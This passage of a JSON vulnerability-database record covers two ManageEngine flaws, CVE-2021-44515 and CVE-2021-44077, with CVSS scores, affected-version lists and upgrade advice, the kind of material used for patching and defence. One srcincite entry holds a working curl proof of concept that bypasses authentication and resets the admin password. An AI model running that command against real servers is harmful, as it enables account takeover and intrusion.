"cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11137:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9239:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10502:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11128:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9321:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9426:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9234:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9410:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9405:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11211:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9232:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9417:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9025:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9033:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8215:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10018:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11133:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11122:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:12.0:12002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9425:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11208:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11133:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9044:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9413:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11137:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9026:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9411:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10507:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8211:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11134:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8212:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11109:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10505:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9414:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11125:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9406:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11134:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9404:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11123:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8216:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10020:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9319:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9227:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9418:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9212:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9336:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9315:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9403:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9312:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11124:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11210:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9034:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9037:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11128:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9228:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10515:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9211:*:*:*:*:*:*"]}, {"lastseen": "2022-07-13T18:04:18", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-12T05:15:00", "type": "cve", "title": "CVE-2021-44515", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "id": "CVE-2021-44515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2022-07-13T18:04:35", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-29T04:15:00", "type": "cve", "title": "CVE-2021-44077", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:zohocorp:manageengine_supportcenter_plus:11.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.2", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.1", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.3", "cpe:/a:zohocorp:manageengine_servicedesk_plus_msp:10.5"], "id": "CVE-2021-44077", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44077", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10508:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10504:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10512:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11209:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10523:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10525:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10503:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11211:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11145:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10524:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10519:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10506:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10502:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11142:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11141:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10505:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10526:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10516:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10529:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10507:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10515:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11210:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11208:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10517:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10518:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10514:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10527:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10522:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10521:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10528:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10513:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-03-16T15:30:13", "description": "An authentication bypass vulnerability exists in Zoho ManageEngine Desktop Central. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Desktop Central Authentication Bypass (CVE-2021-44515)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-03-16T00:00:00", "id": "CPAI-2021-1110", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-13T15:00:42", "description": "A remote code execution vulnerability exists in Zoho ManageEngine ServiceDesk Plus. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-07T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine ServiceDesk Plus Remote Code Execution (CVE-2021-44077)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2022-11-13T00:00:00", "id": "CPAI-2021-0920", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "srcincite": [{"lastseen": "2022-02-27T09:44:51", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to bypass authentication on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the StateFilter class. The issue results from an arbitrary forward during request handling. An attacker can leverage this vulnerability to bypass authentication on the system and reset the administrators password.\n\n**Affected Vendors:**\n\nZoho\n\n**Affected Products:**\n\nManageEngine Desktop Central and ManageEngine Desktop Central MSP <= 10.1.2137.2\n\n**Vendor Response:**\n\nZoho has issued an update to correct this vulnerability. More details can be found at: <https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T00:00:00", "type": "srcincite", "title": "SRC-2022-0001 : Zoho ManageEngine Desktop Central StateFilter Arbitrary Forward Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-01-21T00:00:00", "id": "SRC-2022-0001", "href": "https://srcincite.io/advisories/src-2022-0001/", "sourceData": "curl -kb \"STATE_COOKIE=&_REQS/_TIME/1337\" \"https://target.tld:8383/STATE_ID/1337/changeDefaultAmazonPassword?loginName=admin&newUserPassword=haxed\" -d \"\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": ""}], "attackerkb": [{"lastseen": "2022-01-21T20:28:26", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.\n\n \n**Recent assessments:** \n \n**wvu-r7** at January 14, 2022 9:36am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-21T00:00:00", "type": "attackerkb", "title": "CVE-2021-44515", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-01-21T00:00:00", "id": "AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12", "href": "https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-18T23:13:04", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2021 7:41pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-44077", "bulletinFamily": "info", 